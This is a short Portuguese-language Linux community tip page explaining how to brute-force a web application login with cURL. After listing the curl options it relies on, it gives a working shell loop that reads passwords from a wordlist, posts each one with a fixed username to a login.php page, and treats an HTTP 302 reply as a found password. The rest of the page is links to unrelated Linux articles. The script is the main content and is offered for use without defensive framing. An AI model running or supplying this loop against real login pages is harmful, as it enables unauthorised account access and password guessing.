cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.545 ]
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.
for i in `cat wordlist.txt` do login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php) if [ $login '==' "302" ] then echo "Password: $i" break else echo "Trying: $i" fi donePronto, você já estará fazendo um ataque de brute-force através de uma "word list", usando o terminal.
Instalando o aMSN 0.97RC1 no Ubuntu 7.04 (Feisty Fawn)
Permissão para usuário desligar o sistema sem compremeter a segurança
Placa wireless Broadcom 4310 no Debian Linux
Modens 3G no Linux: qual o problema?
Como adicionar swap no Linux CentOS 7 usando espaço de um Volume Group
Instale o WPS-Office já com a tradução para português no Debian/Ubuntu
Como verificar senha no shell script
Instalando o Visio no Debian/Ubuntu
Converter WMA para MP3 no shell do Linux
Nenhum coment�rio foi encontrado.
O que é o THP na configuração de RAM do Linux e quando desabilitá-lo
Comparação entre os escalonadores BFQ e MQ-Deadline (acesso a disco) no Arch e Debian
Conciliando o uso da ZRAM e SWAP em disco na sua máquina
Servidor de Backup com Ubuntu Server 24.04 LTS, RAID e Duplicati (Dell PowerEdge T420)
Como unir duas coleções de ROMs preservando as versões traduzidas (sem duplicatas)
Como instalar o Telegram Desktop no Ubuntu 24.04
Overclocking Permanente para Drastic no Miyoo Mini Plus
Problemas de chaves (/usr/share/keyrings) no Debian
Converter os repositórios Debian para o novo formato com as chaves
Salvar estado da VM no virt-manager [RESOLVIDO] (5)
Primeiras impressões do Debian 13 (11)